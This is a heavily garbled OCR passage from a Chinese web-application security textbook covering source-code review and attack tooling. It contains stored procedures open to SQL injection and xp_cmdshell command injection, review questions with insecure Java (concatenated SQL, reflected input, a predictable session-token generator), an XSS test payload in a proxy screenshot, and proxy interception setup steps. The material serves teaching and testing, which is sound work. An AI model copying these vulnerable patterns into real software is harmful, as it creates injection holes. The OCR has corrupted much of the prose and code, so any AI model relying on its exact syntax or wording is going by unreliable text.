下 面 以 一 个 aname 人 参数 易于 受到 SQL 注入 的 存储 过 程 为 例 : 


CREATE PROCEDURE show current orders 





(Gname varchar(400}) = NULL) 
AS 
DECLARE GSGL nvarchar (4000) 
SELECT @sql = 'SELECT id num, searchstring FROM searchorders WHERE ' + 
'searchstring = 1 + @name + ( 1011 


EXEC (@sql) 











GO 

即使 应 用 程序 将 用 户 提 交 的 name 值 安全 传送 给 存储 过 程 ， 该 过 程 本 身 也 会 直接 把 这 个 值 连 
接 到 一 个 动态 查询 中 ， 因 此 它 易 于 受到 攻击 。 

不 同 的 数据 库 平 台 使 用 不 同 的 方法 动态 执行 包含 SQL 语 句 的 字符 串 ， 如 下 所 示 。 

UD MS-SQL: EXEC 

DQ Oracle: EXECUTE IMMEDIATE 





U Sybase: EXEC 
D DB2: EXEC SQL 


19.9 ”代码 浏览 工具 547 





应 对 出 现在 数据 库 代 码 组 件 中 的 这 些 表达 式 进 行 仔细 审查 。 如 采 将 用 户 提 交 的 输入 用 于 构建 
SQL 字符 串 ， 应 用 程序 可 能 多 于 受到 SQL 注入 攻击 。 











注解 ”在 Oracle 中 ， 存 储 过 程 默 认 在 定义 者 权限 而 非 调用 者 权限 下 运行 (与 UNIX 中 的 
SUID 程 序 相 同 )。 因 此 , 如果 应 用 程序 使 用 一 个 低 权 限 账 户 访问 数 据 库 , 并 且 使 用 DBA 





账户 建立 存储 过 程 ， 那 么 攻击 者 就 可 以 利用 某 个 过 程 中 存在 的 SQL 注 入 汤 洞 提升 自己 
的 权限 ， 并 执行 任意 数据 库 查询 。 


19.8.2 ”调用 危险 的 函数 

存储 过 程 之 类 的 定制 代码 组 件 常 用 于 执行 不 常见 的 或 功能 强大 的 操作 。 如果 以 不 安全 的 方式 
向 一 个 潜在 危险 的 函数 传送 用 户 提 交 的 数据 , 那么 根据 该 函数 的 功能 , 这 样 做 可 能 会 导致 各 种 类 
型 的 漏洞 。 例 如 ， 下 面 的 存储 过 程 的 eloadfile 与 eloaddqir 人 参数 就 易于 受到 命令 注入 攻击 。 











Create import data (eloadqf1lle varchar{25})}, @loaddir varchar(25) ) 
as 

begin 

select @cmdstring = "S$PATH/firstload ”+ @loadfile + " " + @loaddir 
exec @ret = xp_cmAdshell] @cmdstring 

End 





如 果 以 不 安全 的 方式 调用 ， 下 面 的 水 数 可 能 造成 危险 。 

口 MS-SQL 与 Sybase 中 功能 强大 的 存储 过 程 ， 使 用 它们 可 执行 命令 或 访问 注册 表 等 。 
口 用 于 访问 文件 系统 的 也 数 。 

口 连接 到 数据 库 以 外 的 库 的 用 户 定 义 的 函数 。 

口 可 访问 网 络 的 函数 ; 例如 ， 通 过 MS-SQL 中 的 openRowset 或 Oracle 中 的 数据 库 链 接 。 
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到 目前 为 止 , 我 们 描述 的 代码 审查 方法 大 多 要 求 阅 读 源 代码 , 并 从 中 搜索 表示 获取 用 户 输入 
及 使 用 潜在 危险 的 API 的 模式 。 因 此 , 为 进行 有 效 的 代码 审查 , 最 好 使 用 一 款 智 能 工具 浏览 代码 ; 
也 就 是 说 ， 该 工具 能 够 理解 各 种 语言 使 用 的 代码 结构 ， 提 供与 特定 API 和 表达 式 有 关 的 上 下 文 信 
上 县， 并 能 够 方便 地 进行 导航 。 

在 许多 语言 中 ， 可 以 使 用 某 种 开发 工作 室 ， 如 Visual Studio 、NetBeans 或 Eclipse。 还 有 各 种 一 
般 性 的 代码 浏览 工具 ， 它 们 文 持 各 种 语言 ， 并 且 可 进行 优化 ， 以 方便 阅读 代码 。Source Insight 是 
我 们 首选 的 工具 ， 如 图 19-1 所 示 。 它 文 持 源 代 码 树 浏览 ， 拥 有 强大 的 搜索 功能 ， 使 用 一 个 预览 框 
显示 与 任何 选中 的 表达 式 有 关 的 上 下 文 信息 ， 并 且 能 够 在 代码 之 间 快 速 导航 。 
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public class MMEEEEERYT 


implements Serializable { 


[LE 


logging 


这 Sb Logger log = Logger.getLogger(IwmaSession,.class); 


”instance attribute 
private boolean i ior 
private boolean m_LanguageToggled = true,; 


http session 机 related 

private List m_Be m 

transient private Hp SPYlot edest m_Request; 

transient private HttpServletResponse m_Responsei 本 


别 : 和 装 :要 嫩 | | 村 
| 











图 19-1 使 用 Source Insight 搜 索 和 浏览 某 个 Web 应 用 程序 的 源 代码 


19.10 小结 


许多 在 测试 Web 应 用 程序 方面 拥有 实际 经 验 的 人 ,对 于 审查 一 个 应 用 程序 的 代码 并 直接 从 中 
发 现 漏洞 ,往往 表现 出 不 合 帝 理 的 惑 惧 。 对 于 那些 没 做 过 程序 员 的 人 而 言 , 产生 这 种 灵 惧 是 可 以 
理解 的 ， 但 也 ee 任何 丈 悉 计算 机 的 人 ， 只 要 伦 一 点 儿 投 资 ， 就 可 以 拥有 
足够 的 知识 与 信心 ， 进行 有 效 的 代码 审查 。 当 审查 一 个 应 用 程序 的 代码 时 , 不 一 定 要 发 现 其 中 包 
含 的 “全 部 ”漏洞 ， we 设 定 这 个 不 现实 的 目标 。 更 合理 的 做 法 是 ， 
着 于 了 解 应 用 程序 对 用 户 提 交 的 输入 进行 了 哪些 关键 的 处 理 , 认 清 一 些 表示 应 用 程序 可 能 存在 汤 
润 的 签名 。 这 样 ， 代 码 审查 才 可 以 与 大 家 更 加 熟悉 的 “ 黑 盒 ”测试 方法 互 为 补充 ， 提 高 “ 黑 盒 ” 
测试 的 效率 ， 并 披露 完全 从 外 部 访问 应 用 程序 时 非常 难以 发 现 的 漏洞 。 


19.11 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh。 

(1) 列 ie 明确 签名 的 常见 漏洞 。 

(2) 当 审 查 PHP 应 用 程序 时 ， 为 什么 有 时 很 难 确定 用 户 输入 的 所 有 来 源 ? 
(3) 以 下 两 个 执行 SQL 查 询 的 方法 都 使 用 了 用 户 提 交 的 输入 : 


/:/: method 1 
String artist = request.getParameter ("artist"}) .replaceaAll{"", "™''"); 
String genre = regquest.getPparameter{'"'genre") .replaceaAll{"™ i'", m1"),; 
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String album = reoquest.getPparameter{"album")} .replaceaAll{"", Mi"); 








Statement S = connection.createStatement{().: 
SsS.executeQuery ("SELECT * FROM music WHERE artist = '" + artist + 
'" AND genre = '" + genre + '" AND album = ”二 album + "'"):; 


// method 2 
String artist = request.getParameter{"artist"),; 
String genre = request.getParameter ("genre"),; 
String album = regquest.getParameter ("album").; 
Statement S = connection.prepareSsStatement ( 
"SELECT * FROM mugsic WHERE artist = '" + Aartigst + 
"1 AND genre = ? AND album = ?"); 





s.sSetSstring(1, genre): 
s.Ssetstring(2, album): 


s .executeQuery1) ; 

哪 一 个 方法 更 加 安全 ， 为 什么 ? 

(4) 在 审查 一 个 Java 应 用 程序 代码 时 , 首先 要 检查 HttpServLetReduest .getParameteL 
API 的 所 有 用 法 。 下 列 代码 引起 了 你 的 注意 : 


Drivate void setWelcomeMessage (HttpServiletRegquest regquest) throws 





ServietException 


String name = request.getParameter ("name")}; 
if (name == null) 

name = "™"} 
m welcomeMessage = ‘Welcome " + name +"!"; 


} 
这 段 代码 表示 应 用 程序 中 可 能 存在 什么 漏洞 ? 还 需要 进行 哪些 代码 分 析 才 能 确定 应 用 程序 

征 否 硝 实 易于 受到 攻击 ? 
(5) 假设 渗透 测试 员 正 在 审查 一 个 应 用 程序 用 于 生成 会 话 令 牌 的 机 制 。 相 关 代 码 如 下 : 1 

















Public class TokenGenerator 


{ 


private java.util.Random r = new java.util.Random!(): 


Public synchronized long nextToken!() 


{ 
long 1 = r.nextTint!(); 


long m = r.nextIint(); 


return 1 + {m << 32): 





应 用 程序 生成 的 会 话 令 有 牌 是 否 可 以 预测 ?请 解释 理由 。 





四] 需要 使 用 一 个 标准 的 Web 浏 览 硕 即 可 实施 一 些 针 对 Web 应 用 程序 的 攻击 ; 然而 ， 绝 大 

广 疏 多 数 攻击 要 求 使 用 其 他 一 些 工 具 。 许 多 这 样 的 工具 需要 与 浏览 此 组 合 在 一 起 使 用 ， 以 
扩展 的 形式 修改 浏览 带 日 号 的 功能 , 或 者 作为 外 部 工具 与 浏览 带 同 时 运行 , 并 修改 它 与 日 标 应 用 
程序 的 交互 。 

墨客 工具 包 中 最 重要 的 工具 属于 后 者 ， 它 作为 Web 拦 鹤 代 理 服务 带 运行 ， 允 许 查 看 并 修改 训 
览 融 与 目标 应 用 程序 之 间 传 送 的 所 有 HTTP 消 息 。 近 些 年 来 ， 基 本 的 拦截 代理 服务 骨 已 经 发 展 成 
为 功能 强大 的 集成 工具 套件 ， 拥 有 大 量 旨 在 帮助 黑客 攻击 Web 应 用 程序 的 功能 。 本 章 将 介绍 这 类 
工具 的 作用 原理 ， 并 说 明 如 何 充分 利用 它们 的 功能 。 

第 二 类 主要 的 工具 为 Web 应 用 程序 扫 措 融 。 这 种 产品 下 在 将 攻击 Web 应 用 程序 过 程 中 的 许多 
任务 日 动 化 ， 闻 兰 初 步 解 析 一 二 到 探查 漏洞 等 过 程 。 我 们 将 分 析 Web 应 用 程序 扫描 带 的 内 在 优 缺 
上 护 ， 并 简要 介绍 这 个 领域 内 儿 球 当前 市 场 领先 的 产品 。 

最 后 ， 还 有 很 多 定制 的 小 型 工具 都 可 在 测试 Web 应 用 程序 时 执行 特定 的 任务 。 虽 然 渗透 测试 
员 可 能 只 是 侦 尔 使 用 这 些 工具 ,但 事实 证 明 ， 在 特殊 情况 下 ,它们 极其 有 用 。 


20.1 Web 浏览 训 


Web 训 览 硕 其 实 并 不 是 一 种 攻击 工具 , 而 是 访问 Web 应 用 程序 的 标准 方法 。 然而 , 在 攻击 Web 
应 用 程序 时 ， 渗 透 测试 员 选 择 的 Web 训 览 带 会 影响 攻击 效率 。 此 外 ,还 有 各 种 针对 不 同 交 型 浏览 
傣 的 扩展 可 帮助 渗透 测试 员 实 施 攻 击 。 本 市 将 简要 介绍 3 种 流行 的 浏览 瘟 以 及 它们 的 一 些 扩 展 。 





























20.1.1 Internet Explorer 


Microsoft 的 Internet Explorer (IE ) 是 当前 应 用 最 广泛 的 Web 浏 览 硕 。 据 估计 ， 现 在 依然 如 此 ， 
IE 市 场 占 有 率 大 约 为 43%。 几 乎 所 有 的 Web 应 用 程序 都 针对 下 设计 ， 并 通过 正 进 行 测 试 ， 这 使 得 
它 成 为 攻击 者 的 首选 浏览 硕 ， 因 为 大 多 数 应 用 程序 的 内 容 与 功能 都 能 人 够 在 正中 正确 显示 和 使 用 。 
而 且 ， 其 他 浏览 融 本 映 并 不 文 持 ActiveX 探 件 ; 因此 ， 如 果 一 个 应 用 程序 使 用 这 种 控件 ， 就 必须 
使 用 正 来 浏览 它 。 使 用 正 的 局 限 性 在 于 ， 与 使 用 其 他 浏览 带 不 同 ， 它 必须 在 Microsoft Windows 平 
台 上 运行 。 


由 于 IE 被 人 们 广泛 使 用 ， 因 此， 当 测 试 跨 站 点 脚本 与 其 他 针对 应 用 程序 用 户 的 攻击 时 ,应 该 
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始终 确保 攻击 能 够 在 这 种 浏览 硕 上 成 功 实 施 〈 请 参阅 第 12 划 了解 相关 内 容 )。 


注解 Internet J 8 引入 了 一 个 默认 处 于 启用 状态 的 反 XSS 筛 选 器 。 如 第 12 章 所 
述 , 此 径 选 器 sm “标准 的 XSS 攻 击 , 因此 , 在 针对 目标 应 用 程序 测试 XSS 


入 侵 程 序 时 ， 该 温 选 器 可 能 会 导 臻 问题。 通常， 在 测试 过 程 中 应 禁用 该 XSS 筛 选 器 。 
和 个 XSS 漏 洞 后 ， 最 好 是 重新 启用 该 筛选 器 ， 看 是 否 可 以 利用 发 现 的 漏洞 找到 
避 开 该 季 选 器 的 方法 。 





以 下 IE 扩展 有 助 于 攻击 Web 应 用 程序 。 

口 HttpWatch 可 分 析 所 有 HTTP 请 求 与 啊 应 ， 提 供 消 息 头 、cookie、URL 、 请 求 参数 、HTTP 
状态 码 与 重 定 问 等 信息 ( 如 图 20-1 所 示 )。 

口 下 Watch 的 功能 与 HttpWatch 类 似 ， 同 时 还 可 分 析 HTTP 文 要 、 图 像 、 脚 本 等 。 
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Headers Sent Value | Headers Received Value 
| (Request-Line) GET /HTTP/1.1 {Status-Line) HTTP/1.1 301 Moved Permanently 

Accept application/x-ms-application, image/ipeg, application/xaml+xml, image/oif, im| | | Cadhe-Control public, max-age=2592000 

Accept-Encoding gzip, deflate Content-Leng 了 h 219 
二 AcceptLanguage en-G3 Content-Type text/html; charset=UTF-8 
汪 Connection Keep-Alive Date Thu, 14 Apr 2011 13:55:47 GMT 
加 | Cookie PREF=ID=3d6e6af26a580018:FF=0:TM=1302704208:LM=1302704208:S=\| | | Expires Sat, 14May 2011 13:55:47 GMT 
忌 Host goode.com Location http://www.google.com/ 
三 User-Agent Mozila/4.0 mpi MSIE 8.0; Windows NT 6.1 WOW64; Trident/4.0; S.| | | Server gws 
芋 PE pr 可 由 X-XSSProtection 1; mode=block 

©@ Internet | Protected Mode 0 On fav R100% ~ 





图 20-1 HttpWatch 对 Internet Explorer 发 布 的 HTTP 请 求 进行 分 析 


20.1.2 Firefox 


Firefox 是 当前 第 二 大 Web 浏 览 絮 ， 据 估计 ， 市 场 占有 率 大 约 为 35%。 绝 大 多 数 Web 应 用 程序 
可 在 Firefox 上 正常 运行 ; 但 是 ， 它 本 号 并 不 支持 ActiveX 控 件 。 
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不 同 的 浏览 希 在 处 理 HTML 方 面 存在 许多 细微 的 差异 ,特别 是 当 HITML 并 不 严格 符合 标准 时 。 
通常 ， 如 采 一 个 应 用 程序 针对 器 站 点 脚本 实施 防御 , 这 意味 看 针对 它 的 攻击 并 不 会 对 每 种 浏览 
平台 有 效 。Firefox 的 普及 使 得 这 种 浏览 器 成 为 XSS 攻 击 的 主要 目标 ， 因此 ， 如 果 在 IE 上 实施 XSS 
攻击 遇 到 困难 ， 应 该 尝试 在 Firefox 上 测试 这 些 攻击 。 此 外 ， 之 前 ， 针 对 IE 无 效 的 许多 攻击 能 够 对 
Firefox 实 施 ， 主 要 因为 它 的 某 些 特有 功能 ， 参 见 第 13 划 了解 这 方面 的 内 容 。 

当 攻 击 Web 应 用 程序 时 ， 有 大 量 Firefox 浏 览 器 扩展 可 供 使 用 ， 如 下 所 示 。 

口 Http Watch 也 适用 于 Firefox。 

口 FoxyProxy 能 够 灵活 管理 浏览 需 的 代理 设置 ， 可 实现 迅速 切换 以 及 为 不 同 的 URL 设 置 不 同 

的 代理 等 。 

D LiveHTTPHeaders 可 修改 请 求 与 啊 应 ， 并 重新 发 布 个 别 请 求 。 

口 使 用 PrefBar 可 启用 或 禁用 cookie、 快 速 进行 访问 控制 检查 、 在 不 同 代理 服务 絮 之 间 切 换 、 

清除 缓存 ， 以 及 打开 浏览 需 的 用 户 代 理 。 
口 Wappalyzer 可 确定 当前 页 面 使 用 的 各 种 技术 ， 并 在 URL 栏 为 发 现 的 每 一 种 技术 显示 一 个 
图 标 。 

口 Web Developer 工 具 栏 提供 了 大 量 有 用 功能 。 其 中 最 重要 的 功能 包括 查看 页 面 上 的 所 有 链 
接 、 更 改 HTML 使 表单 字段 可 写 、 取 消 最 大 长 度 限制 、 显 示 隐 藏 表单 字段 ， 以 及 将 请 求 方 
法 由 GET 更 改 为 POST。 




















20.1.3 Chrome 


在 浏览 硕 领 域 ，Chrome 是 一 款 相 对 较 新 的 浏览 顶 ， 但 它 迅 速 电 得 用 户 的 欢迎 ， 并 占领 了 约 
15% 的 市 场 。 

攻击 Web 应 用 程序 可 能 会 用 到 各 种 Chrome 浏 览 郑 扩展 ， 如 下 所 示 。 

口 XSS Rays， 该 扩展 可 用 于 测试 XSS 漏 洞 和 DOM 检 测 。 

D cookie 编 辑 希 ， 用 于 在 浏览 硕 中 查看 和 编辑 cookie。 

口 Wappalyzer 也 可 以 用 于 Chrome。 

口 Web Developer 工具 栏 也 可 以 用 于 Chrome。 














Chrome 可 能 包含 一 些 奇 怪 的 功能 , 在 构建 针对 XSS 和 其 他 漏洞 的 攻击 时 , 这 些 功能 可 能 会 有 
用 。 由 于 Chrome 是 一 球 相 对 较 新 的 浏览 入， 因此 ， 在 未 来 数 年 中 ， 人 研究 这 些 功能 可 能 会 取得 一 


定 的 成 果 。 


20.2 集成 测试 套件 


当 攻 击 Web 应 用 程序 时 , 除 基本 的 Web 浏 览 融 外 , 工具 包 中 最 有 用 的 工具 为 拦截 代理 服务 做 。 
在 Web 应 用 程序 发 展 的 早期 ,拦截 代理 服务 表 是 一 种 独立 的 工具 , 它 提 供 最 基本 的 功能 ，Achilles 
代理 服务 硕 是 尤其 受 推 及 的 一 种 ， 它 显示 每 一 个 请 求 与 啊 应 ， 以 方便 对 其 进行 编辑 。 虽 然 这 殖 工 
具 极 其 简单 , 存在 许多 缺陷 , 而且 使 用 起 来 也 不 方便 ,但 经 验 丰 宇 的 攻击 者 仍然 可 以 利用 它 攻破 
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许多 Web 应 用 程序 。 

近年 来 ， 这 和 区 简单 的 拦截 代理 服务 硕 已 经 发 展 成 为 许多 功能 强大 的 工具 套件 ,包含 几 种 相 
互补 充 的 工具 ， 能 够 完成 攻击 Web 应 用 程序 过 程 中 的 常见 任务 。Web 应 用 程序 安全 测试 仪 常 用 
的 测试 套件 如 下 所 示 : 

DQ Burp Sulte 

口 WebScarab 

UD Paros 

DQ Zed Attack Proxy 

口 Andiparos 

口 Fiddler 

DD CAT 

口 Charles 

这 些 工具 包 的 功能 各 不 相同 , 其 中 一 些 相对 较 新 ,并 更 具 实 验 性 ,单纯 就 功能 而 言 , Burp Suite 
是 其 中 最 为 复杂 全 面 的 工具 。 当 前 , 它 是 唯一 包含 以 下 几 市 介绍 的 所 有 功能 的 工具 包 。 在 茶 种 程 
度 上 , 选择 使 用 哪些 工具 因 个 人 喜好 而 异 。 我们 建议 没有 任何 豆 好 的 测试 员 在 现实 应 用 中 先 选 择 
几 种 套件 ， 然 后 确定 哪些 工具 最 适合 自己 的 需求 。 

本 节 介 绍 这 些 工具 的 工作 原理 ,并 说 明 在 测试 Web 应 用 程序 时 充分 利用 这 些 工 具 的 和 常用 工作 


流程 。 
20.2.1 工作 原理 


上 述 每 一 种 集成 测试 套件 都 由 几 种 相互 补充 的 工具 组 成 ， 它 们 共享 与 目标 应 用 程序 有 关 
的 信息 。 通 稍 ， 攻 击 者 通过 浏览 硕 以 正 向 方式 攻击 应 用 程序 ， 这 些 工 具 监 探 生成 的 请 求 与 啊 
应 ， 保 存 所 有 与 目标 应 用 程序 有 关 的 信息 ， 并 提供 大 量 有 用 的 功能 。 每 一 种 套件 由 以 下 核心 
组 件 构 成 : 

口 拦截 代理 服务 天 

口 Web 应 用 程序 爬虫 

口 目 定 义 Web 应 用 程序 漏洞 测试 大 

D 漏洞 扫描 顶 

口 手动 请 求 工 具 

口 分 析 会 话 cookie 与 其 他 令 牌 的 工具 

口 各 种 共 圣 功能 与 实用 工具 

1. 拦截 代理 服务 器 

拦截 代理 服务 器 是 工具 套件 的 核心 ， 至 今 仍 然 是 最 基本 的 组 件 。 要 使 用 拦截 代理 服务 右 ， 必 
须 配 置 浏 览 需 , 将 它 的 代理 服务 硕 作 为 本 地 机 带 上 的 一 个 端口 。 同 时 配置 代理 工具 监听 这 个 端口 ， 
并 接收 由 训 览 锅 发 布 的 所 有 请 求 。 由 于 代理 服务 需 能 够 访问 浏览 硕 与 目标 Web 服 务 硕 之 间 的 双 辕 
通信 ， 因 而 它 能 够 拦截 它们 之 间 传 送 的 每 一 条 消息 ， 以 方便 用 户 审查 和 修改 ， 并 执行 其 他 有 用 的 
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功能 ， 如 图 20-2 所 示 。 


( 通 





| ee ee 
$ burp suite professional 
burp intruder repeater window about 





| target | proxy | spider | scanner | intruder | repeater | Sequencer | decoder | comparer options | alerts | 








intercept | options | history | 





requestto httpmdsecnet80 11/215.50.129] 








| forward | drop | intercept is on 








raw | params | headers | hex | viewstate | 








POST /search/1- /Default. aspx HTTP/1.1 
Acce ept: application/x-ms— -applicatio my image/jpe Er application/xaml+x my imadge/ gif, 
imadge/ pijped, a cation/x-ms-—-xbap, application/x-shockwave-flash, * 
Re i http:/,/mdsec.net/search/l1l/Default .asDx 
Accept—-Landguadge: en-GB 
User-Agent: Mo a 4.0 (compatible; MSIE 8.0; Windows NT €.1; WOWE4; Trident/4.0; SLCC2; 
NET GER: eau0TeT NET GER 水 30729; .NET CLE 3.0.30729; .NET4.0c; InfoPath.3; 
MET OEs FDM NEIT GLR:L:Lad3 
ontent— Yhe: application/x—-Wwwywy— ES orm-urlencoded 
ee cept—-Encoding: gsip, ps 
Host: i Cc.net 
Content-Length: 153 
Proxy-Connection: Keep-Alive 
Pragma: no-cache 


_VIEWSTATE=$2FWwEPDWwURKMTOOMz2gS MTOQA4MGRKESMKhS Ea tytkzIhFxB4vWSitZygs3DeSearchTerm=<script>ale 
rt(1) i Ne Searchtsearchtype=1 











4 











Er lslEs|| | 0 matches]| 

















图 20-2 ”使 用 拦截 代理 服务 器 动态 处 理 HTTP 请 求 


eUU000 

浏览 需 的 配置 过 程 相 当 人 简单 。 首 先 , 确定 拦截 代理 服务 需 默 认 使 用 哪 一 个 本 地 端口 监听 连接 

常 为 8080 端 口 )， 然 后 在 浏览 器 上 执行 以 下 步骤 。 

口 在 Internet Explorer 中 ， 选 择 “ 工 具 ” 一 “Iternet 选 项 ”一 “连接 ”一 “局 域 网 设置 ”。 
确保 没有 选中 “自动 检测 设置 ”与 “使 用 目 动 配置 脚本 ” 复 选 框 。 确 保 选 中 “为 LAN 使 
用 代理 服务 各 ” 复 选 框 。 在 “地 址 ” 栏 中 输入 127.0.0.1; 在 “器 口 ” 栏 中 输入 代理 服务 
器 使 用 的 端口 。 单 击 “ 高 级 ”按钮 ， 确 保 选 中 “对 所 有 协议 均 使 用 相同 的 代理 服务 器 ” 
复 选 框 。 如 果 所 攻击 的 主机 名 称 与 “对 于 以 下 列 字符 开头 的 地 址 不 使 用 代理 服务 器 ” 框 
中 的 任何 一 个 表达 式 相 匹配 ， 删 除 这 些 表 达 式 。 在 所 有 对 话 框 上 单 击 “确定 ”按钮 ， 确 
认 重 新 配置 。 

口 在 Firefox 中 ， 选 择 “ 工 具 ” 一 “选项 ”一 “高 级 ”， 选 择 “ 网 络 ” 选 项 卡 ， 单 击 “ 连 接 ” 
栏 的 “设置 ”按钮 ， 确 保 选 中 “手动 配置 代理 ”选项 。 在“ 代理” 栏 中 输入 127.0.0.1; 在 
“端口 ” 栏 中 输入 代理 服务 器 使 用 的 端口 。 如 果 所 攻击 的 主机 名 称 与 “不 使 用 代理 ” 框 中 
的 任何 一 个 表达 式 相 匹配 ， 删 除 这 些 表达 式 。 在 所 有 对 话 框 上 单 击 “确定 ”按钮 ， 确 认 
重新 配置 。 

口 Chrome 使 用 其 所 在 的 操作 系统 附带 的 本 地 浏览 器 的 代理 设置 。 在 Chrome 中 ， 可 以 通过 选 
择 “ 选 项 ”一 “高 级 选项 ”一 “网 络 ” 一 “更 改 代理 设置 ”访问 这 些 设置 。 
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处 理 “ 不 支持 代理 ”的 客 尸 端 
有 时 , 测试 员 需 要 测试 使 用 在 浏览 硕 以 外 运行 的 厚 客 户 奖 的 应 用 程序 。 许 多 这 类 客户 站 并 








不 提供 任何 用 于 配置 HTTP 代理 服 务 需 的 设置 。 它 们 只 是 答 试 直接 连接 到 托管 应 用 程序 的 Web 
服务 硕 。 这 种 行为 导致 测试 员 根 本 无 法 使 用 拦截 代理 服务 天 来 查看 和 修改 应 用 程序 的 流量 。 

幸好 ， 在 这 种 情况 下 ， 测 试 员 可 以 利用 Burp Suite 提 供 的 一 些 功能 继续 完成 测试 。 为 此 ， 
测试 员 需 要 执行 以 下 步 又 : 

(1) 修改 操作 系统 hosts 文 件 ， 将 应 用 程序 使 用 的 主机 名 解析 为 测试 员 目 己 的 回环 地 址 
(127.0.0.1 )。 例 如 : 127.0.0.1 www.wahh-app.com 这 会 导致 厚 客 户 端的 请 求 被 重 定 加 到 测试 员 自 
己 的 计算 机 。 

(2) 对 于 应 用 程序 使 用 的 每 个 目标 端口 (通常 为 80 和 443 并 口 )， 在 回环 接口 的 这 些 端口 上 
配置 一 个 Burp Suite 监 听 逢 ， 并 将 该 监听 希 设 置 为 文 持 匿名 代理 。 匿 名 代理 功能 指 监听 需 将 接 
受 厚 客户 端 发 送 的 非 代 理 类 型 的 请 求 (这些 请 求 已 被 重 定 癌 到 测试 员 的 回环 地 址 )。 

(3) 匿名 模式 代理 支持 HTTP 和 HTTPS 请 求 。 为 防止 SSL 遇 到 致命 的 证 书 错误 ， 可 能 需要 将 
匿名 代理 监听 需 配 置 为 显示 包含 厚 客 户 端 期 望 的 特定 主机 名 的 SSL 证 书 。 下 文 将 详细 说 明 如 采 
避免 拦 蕉 代理 服务 硕 导 致 的 证 书 问题 。 

(4) 对 于 已 使 用 hosts 文 件 重 定 问 的 每 个 主机 名 ,配置 Burp 将 主机 名 解析 为 其 原始 的 下 地 址 。 
这 些 设置 位 于 Options 一 Connections 一 Hostname Resolution( 选项 一 连接 一 主机 名 解析 ) 下 。 测 
试 员 可 以 通过 这 些 设置 指定 域名 到 耳 地 址 的 定制 映射 ， 以 履 盖 计算 机 目 己 的 DNS 解析 。 这 样 ， 
Burp 提 出 的 出 站 请 求 将 指出 正确 的 目标 服务 锅 。( 如 采 不 执行 此 步骤 ， 请 求 将 在 无 限 循 环 中 重 
定向 到 测试 员 自 己 的 计算 机 。) 

(5) 在 匿名 模式 下 运行 时 ，Burp Proxy 将 确定 应 使 用 在 请 求 中 显示 的 Host 消 息 头 将 每 个 请 
求 转 发 到 的 目标 主机 。 如 果 所 测试 的 厚 客 户 端 未 在 请 求 中 包含 Host 消 息 头 ，Burp 将 无 法 正确 
转发 请 求 。 如 果 只 需 处 理 一 个 目标 主机 , 可 以 通过 将 匿名 代理 监听 需 配 置 为 将 所 有 请 求 重 定 回 
到 所 需 目标 主机 来 解决 这 一 问题 。 但 如 果 要 处 理 多 个 目标 主机 , 则 需要 在 多 人 台 计 算 机 上 运行 多 
个 Burp 实 例 ， 并 使 用 hosts 文 件 将 每 个 目标 主机 的 流量 重 定向 到 其 他 拦截 服务 着 。 


















































elUUUUOU0UHITPS 

如 第 3 草 所 述 ， 当 处 理 未 加 密 的 HITP 通 信 时 ， 拦 截 代理 服务 带 与 普通 的 Web 代 理 服务 融 的 工 
作 原 理 基 本 相同 。 测 贤 带 和 和 完 丫 代理 服务 各 发 送 标准 的 HTTP 请 求 ， 不 同 之 处 在 于 ,请求 第 一 行 
的 URIL 包 含 目 标 Web 服 务 融 的 完整 主机 名 称 。 代 理 服务 融 将 这 个 主机 名 称 解析 成 一 个 下 地 址 ， 把 
请 求 转 换 为 标准 的 非 代 理 形 式 ， 然 后 将 它 转发 给 目标 服务 天 。 当 该 服务 表 做 出 啊 应 时 ,代理 服务 
俗 就 会 将 啊 应 转发 给 客户 病 浏 览 硕 。 

对 于 HTTPS 通 信 , 浏览 硕 首 先 使 用 coNNECT 方 法 加 代理 服务 天 提出 一 个 明文 请 求 , 指定 目标 
服务 带 的 主机 名 称 与 端口 。 如果 使 用 普通 的 ( 非 拦 截 ) 代理 服务 从 ,代理 服务 珊 就 会 以 一 个 HTTP 
200 状 态 人 码 做 出 啊 应 , 一 耳 开放 TCP 连 接 ， 从 此 以 后 ( 对 该 连接 而 言 ) 作为 目标 服务 奏 的 TCP 级 中 























556 第 20 章 Web 应 用 程序 黑客 工具 包 


继 。 然 后 ,浏览 器 将 与 目标 服务 器 进行 一 次 SSL 握 手 ， 建 立 一 条 安全 信道 ， 通 过 它 传送 HTTP 消 
息 。 当 使 用 拦截 代理 服务 融 时 ， 为 使 代理 服务 天 访问 浏览 需 通 过 信道 传送 的 HTTP 消 息 ， 这 个 过 
程 会 稍 有 不 同 。 如 图 20-3 所 示 , 用 一 个 HTTP 200 状 态 码 响应 coNNECT 请 求 后 ,拦截 代理 服务 器 并 
不 作为 一 个 中 继 , 而 是 在 服务 套 端 与 浏览 屁 进 行 SSL 握 手 。 它 还 作为 一 个 SSL 客 户 端 , 与 目标 Web 
服务 需 进 行 另 一 次 SSL 握 手 。 因 此 ， 这 个 过 程 建立 两 条 SSL 人 信道， 代理 服务 融 则 作为 它们 之 间 的 
“中 间 人 ”。 这 样 ,代理 服务 送 束 能 够 解密 从 每 条 信道 收 到 的 所 有 消息 ， 以 明文 形式 访问 它们 ， 然 


后 重新 对 其 进行 加 密 ， 以 通过 为 一 条 信道 传送 。 

















目标 


一 > 
连接 wahh-app:433 


fz 
个 显示 200 状 态 码 的 响应 





O1010101110... ， | html 01111010100... 
Content-Length: | 
24246 


<html><head>... 


| 代理 服务 器 DE 

SSL 信 道 1 SSL 信 道 2 ”| 

(|!|GET/HITP/1 | 

1101001000100 ' | User-Agent: Mozilla/ ' 1001001101000 |! 
11010100000... ， |4.0(compatible; MSIE| | ; 10001001001... 

' | 7.0; Windows NT 5.1) ' | 

Host: wahh-app.com 

< ' |HTTP/I.1 200 OK | 

1100100110010 ! | Content-Type: text/ ' 0010010100001  ， 





图 20-3 ”通过 拦截 代理 服务 需 查 看 和 修改 HTTPS 通 信 


当然 如果 攻击 者 处 在 适当 的 位 置 ,他 丈 能 够 拦截 浏览 可 与 目标 服务 右 之 间 的 通信 ,并 且 不 
会 被 发 现 ; 这 时 ， 由 于 SSL 无 法 保护 浏览 可 与 服务 大 之 间 通 信和 的 隐秘 性 与 完整 性 ， 它 也 丈 失 去 了 
作用 。 为 此 ， 当 进行 SSL 握 手 时 ， 就 必须 使 用 加 密 证 书 来 验证 每 一 方 的 号 份 ， 这 点 尤为 关键 。 为 
了 在 服务 硕 闪 与 浏览 希 进 行 SSL 握 手 ， 拦 蕉 代理 服务 大 必须 使 用 它 目 己 的 SSL 证 书 ， 因 为 它 并 不 
